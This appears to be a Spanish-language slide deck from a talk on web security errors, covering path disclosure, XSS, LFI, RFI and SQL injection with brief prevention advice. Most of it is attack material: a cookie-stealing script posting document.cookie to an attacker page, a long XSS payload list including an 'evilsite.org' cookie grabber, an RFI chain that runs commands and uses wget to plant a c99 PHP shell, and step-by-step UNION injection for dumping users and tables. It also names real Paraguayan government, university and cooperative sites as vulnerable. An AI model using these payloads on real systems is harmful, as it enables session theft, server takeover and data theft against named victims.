Errores comunes al desarrollar websites Seguridad Web Errores comunes al desarrollar websites

¿Aprenderemos a hackear sitios web? Si, aprenderemos a hackear sitios web, no obstante.. Advertencia: Utilizaremos sitios webs “reales” para mostrar sus vulnerabilidades, sólo con fines educativos. No se va a defacear ningún sitio durante esta charla, simplemente testearlos y ver sus agujeros de seguridad.

Requisitos Temática de la charla Antes de empezar Requisitos Temática de la charla

Pregunta ¿Ya han sido hackeados?

Tipos de vulnerabilidades Full Path Disclosure - FPD Cross-site Scripting – XSS Local File Inclusion – LFI Remote File Inclusion – RFI SQL Injection - SQLi

Full Path Disclosure - FPD Vulnerabilidad que permite al “atacante” ver el path absoluta donde se encuentra el sitio web. Ejemplo: /home/usuario_victima/public_html/ Peligrosidad baja, no obstante, combinado con otros tipos de vulnerabilidades como LFI o SQLi se vuelve interesante ¿Cómo conseguirlo? Manipulación de parámetros, ya sea $_GET, $_POST, Cookies Investigando en buscadores como Google ¿Qué podemos hacer con el path obtenido? Podemos identificar el posible usuario FTP, para intentar conseguir ingresar por FTP con método de fuerza bruta. Aplicación de fuerza bruta: Bruter Combinar con LFI o SQLi para lograr incluir efectivamente archivos o hacer dump de la base de datos

Full Path Disclosure - FPD ¿Cómo prevenirlo? Principalmente, deshabilitando que se muestren los errores php.ini: display_errors = "off" httpd.conf/apache2.conf: display_errors off php_flag Script PHP: ini_set ('display_errors', false); Además, controlando que estén seteadas las variables antes de utilizarlas, controlar que exista archivos antes de incluirlos, validación de variables. Con el primer paso ya basta, ya que no se mostrará nada, no obstante no está de más aplicar esto por recomendaciones de buena programación

Ejemplo- FPD Buscamos en Google warning inurl:gov.py filetype:php En este caso buscamos warning en sitios del gobierno de paraguay, pero podemos utilizar otras variantes, como ser: Fatal error, Notice, undefined function, etc

Cross-site Scripting – XSS Vulnerabilidad que permite al “atacante” inyectar código que será interpretado en el cliente, como ser JavaScript, VBScript, HTML, CSS. Podemos lograr: Hacer phishing Robo de cookies Deface via JS ¿Cómo podemos evitarlo? Controlando antes de mostrar algún dato dinámico, por ejemplo en PHP con el uso de la función htmlentities(), que remplaza los caracteres especiales por su equivalente de HTML

Robo de cookies En el sitio atacado: Publicar el siguiente código: <script> window.open("http://localhost/sitio2/cookie.php?cookies="+document.cookie); </script> En nuestro sitio: Crear un archivo cookie.php en el cual: Obtenemos la variable $_GET[‘cookies’] La enviamos a nuestro e-mail Escribimos en un archivo de texto Insertamos en una base de datos Mostramos un mensaje al usuario para confundirlo, como ser: “En este momento la página se encuentra en mantenimiento. Favor intentar en 10 minutos”

Ejemplos de Xss <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\"> <META HTTP- EQUIV=\"refresh\"CONTENT=\"0;url=javascript:alert('XSS');\"> '">><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '>><marquee><h1>XSS</h1></marquee> "><script alert(String.fromCharCode(88,83,83))</script> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> <div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromC harCode(88,83,83));'))"> window.alert("Xyli !"); "/></a></><img src=1.gif onerror=alert(1)> [color=red' onmouseover="alert('xss')"]mouse over[/color] <body onLoad="alert('XSS');" <body onunload="javascript:alert('XSS');"> [url=javascript:alert('XSS');]click me[/url] <script language="JavaScript">alert('XSS')</script> <img src="javascript:alert('XSS')"> '); alert('XSS <font style='color:expression(alert(document.cookie))'> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> </textarea><script>alert(/xss/)</script> </title><script>alert(/xss/)</script> <script src=http://yoursite.com/your_files.js></script> "><script>alert(0)</script> <IMG src=javascript:alert(String.fromCharCode(88,83,83))> <marquee><script>alert('XSS')</script></marquee> <style>@import'javascript:alert(\"XSS\")';</style> <img src=foo.png onerror=alert(/xssed/) /> <script>alert(String.fromCharCode(88,83,83))</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script>

Local File Inclusion – LFI Vulnerabilidad que permite al “atacante” mediante la manipulación de parámetros $_GET, $_POST incluir archivos ya existentes en el servidor, los cuales no son propios de la app. <?PHP include $_GET[‘pagina’]; // Se puede aplicar LFI ?> Podemos lograr: Ver archivos del sistema, como /etc/passwd, /etc/group Inclusión de archivos con código malicioso previamente insertado Forzar archivos de la app, si posee un sistema de descarga con bug LFI ¿Cómo podemos evitarlo? Se lo puede evitar seleccionando qué archivos específicamente pueden ser mostrados, de tal manera que si el archivo solicitado no está en la lista, no se podrá acceder a él.

SITIOS A TESTEAR LFI Mostrando archivos del sistema Senado - SIL - Sistema de Información Legislativa http://www.senado.gov.py/silpy/ Indert - Instituto Nacional de Desarrollo Rural y de la Tierra http://www.indert.gov.py/ CeConsult - Centro de Consultores http://www.ceconsult.com.py/ Cooperativa Coofy LTDA http://www.coofy.coop.py/ * Las URL con la vulnerabilidad demostrada en el evento fueron suprimidos, se mostraron sólo con fines educativos

SITIOS A TESTEAR LFI Bajando archivos de la APP Cooperativa San Cristobal: http://www.sancristobal.coop.py/ CNCSP - Cámara Nacional de Comercio y Servicios de Paraguay www.ccparaguay.com.py/ TSJE – Tribunal Superior de Justicia Electoral http://www.tsje.gov.py/ * Las URL con la vulnerabilidad demostrada en el evento fueron suprimidos, se mostraron sólo con fines educativos

Remote File Inclusion – RFI Es una vulnerabilidad que sólo se da en PHP, consiste en la inclusión de archivos remotos (que se encuentran en otros servidores) mediante “include”. No se da en ASP. Para que funcione debe estar habilitado url_allow_include ¿Qué podemos lograr? Inclusión de archivos remotos para ejecución de codigo malicioso ¿Cómo lograrlo? http://[servidor_victima]/index.php?pagina=http://[servidor_atacante]/cmd.txt&&cmd=ls En el archivo cmd.txt tenemos el código <?php exec($_GET[‘cmd’]);?> Se puede utiilizar exec(), shell_exec(), system(), passthru() Lo cual nos permitirá la ejecución de comandos, como por ejemplo descargar un phpshell <?php passthru('wget http://localhost/sitio2/c99.txt -O shell.php');?>

SQL Injection - SQLi Vulnerabilidad en la cual el atacante inserta código SQL para obtención de datos de la DB Ingresar al administrador: Colocamos: Usuario: ’ or 1 = 1 -- (siempre se cumplira) Password: Debería ingresar al administrador si posee SQLi ya que la condición insertada siempre se cumplirá y el resto está comentado Select * from usuario where usuario = ‘’ or 1 = 1 – ‘and pass = ‘’

SQL Injection - SQLi Si el login no tiene vulnerabilidad SQLi tenemos otras opciones Pasos: Identificar agujero, http://localhost/sitio1/index.php?id=1 ejemplo ingresando: 1 and 1 = 1 -- (true) ó 1‘ and 1 = 1 -- 1 and 1 = 0 -- (false) ó 1‘ and 1 = 0 – El comportamiento de la injección and 1 = 1-- y and 1 = 0 -- debería mostrar un comportamiento distinto respecto a lo que se muestra en la página, ya que lo primero siempre se cumple, y lo segundo nunca se cumple. Donde dice – se puede usar también #, es para comentar todo lo que pueda haber luego. Ejemplo: Select id, titulo, contenido from articulos where id = 1 and estado = 1 Select id, titulo, contenido from articulos where id = 1 and 1 = 1 – and estado = 1

Pasos para obtener datos - sqli Obtener la cantidad de columnas que afecta el query donde queremos injectar código SQL Obtener tablas Obtener columnas de tablas Obtener datos deseados Crear archivo con código malicioso para luego subir PHPShell (* Opcional )

obtener cantidad de columnas- sqli select id, titulo, contenido from articulos where id =1 and estado = 1 Insertamos SQL select id, titulo, contenido from articulos where id =1 union select 1 -- and estado = 1 Vamos agregando datos al select hasta que deje de dar error, o no muestre en blanco, o hasta que muestre el contenido como si no hubiésemos hecho la inyección select id, titulo, contenido from articulos where id =1 union select 1,2 -- and estado = 1 select id, titulo, contenido from articulos where id =1 union select 1,2,3 -- and estado = 1 En este último caso igualamos la cantidad de columnas, lo cual ya no debería darnos error SQL y deberíamos ver el contenido normal, entonces en este punto necesimamos que solo se muestre nuestro query y no lo primero, para esto debemos aplicar and 1 = 0 select id, titulo, contenido from articulos where id =1 and 1 = 0 union select 1,2,3 -- and estado = 1 Veremos entonces en la página algunos de los datos 1, 2 o 3

Obteniendo Información de la db select user(),database(),version(),connection_id() Ejemplo en la URL http://sitio.com/index.php?id=id=-1 union select concat(user(), 0x3a, database(), 0x3a, version(), connection_id(), 0x3a),2,3,4--

Obteniendo tablas select table_name from information_schema.tables limit 10,1 Remplazar el 10 por el offset deseado, debemos poner 1,1; luego 1,2; luego 1,3 hasta encontrar una tabla que nos interese, por ejemplo “usuarios” en 50,1 Ejemplo en la URL http://sitio.com/index.php?id=1 and 1= 0 union select table_name,2,3,4 from information_schema.tables limit 50,1-- Otra opción. Agrupando las tablas. select group_concat(table_name) from information_schema.tables Esquema específico select table_name from information_schema.tables where table_schema = ‘nombre_db‘ Listar tablas exceptuando las de MySQL SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Obteniendo columnas select column_name from information_schema.columns where table_name = ‘usuarios’ and table_column like ‘A’ Si se escapa la comilla ‘, la variante es pasar el string a ASCII: select column_name from information_schema.columns where table_name=char(117,115,101,114,115) También podemos agregar filtro de columna Ejemplo en la URL http://sitio.com/index.php?id=1 and 1= 0 union select column_name,2,3,4,5,6 from information_schema.columns where table_name=char(117,115,101,114,115)-- Otra opción select group_concat(table_name) from information_schema.tables

SITIOS A TESTEAR SQL INJECTION OBTENIENDO USUARIO Y BASE DE DATOS DE LA APP– Envío por GET ANR – Asociación Nacional Republicana http://www.anr.org.py/ UNIDA - Universidad de la Integración de las Américas http://www.unida.edu.py/ Universidad Católica Nuestra Señora de la Asunción: http://www.uca.edu.py/ Cooperativa COOMECIPAR http://www.coomecipar.coop.py/ SIF AMERICA S.A. http://www.sif.com.py/ * Las URL con la vulnerabilidad demostrada en el evento fueron suprimidos, se mostraron sólo con fines educativos

SITIOS A TESTEAR SQL INJECTION OBTENIENDO USUARIO Y BASE DE DATOS DE LA APP – Envío por POST SENADO http://www.senado.gov.py/ * Las URL con la vulnerabilidad demostrada en el evento fueron suprimidos, se mostraron sólo con fines educativos

¿Preguntas?

Conclusión Sitios a los que encontramos agujeros de seguridad efectivamente: Sitios del Gobiernos www.senado.gov.py, www.indert.gov.py, www.tsje.gov.py Universidades Privadas www.uca.edu.py, www.unida.edu.py Cooperativas www.sancristibal.coop.py, www.coomecipar.coop.py Otras instituciones www.anr.gov.py. www.sif.com.py, www.ccparaguay.com.py

Contacto Fernando Goetz Twitter http://twitter.com/fernandogoetz E-mail fenandogoetz@gmail.com * Las consultas son bienvenidas.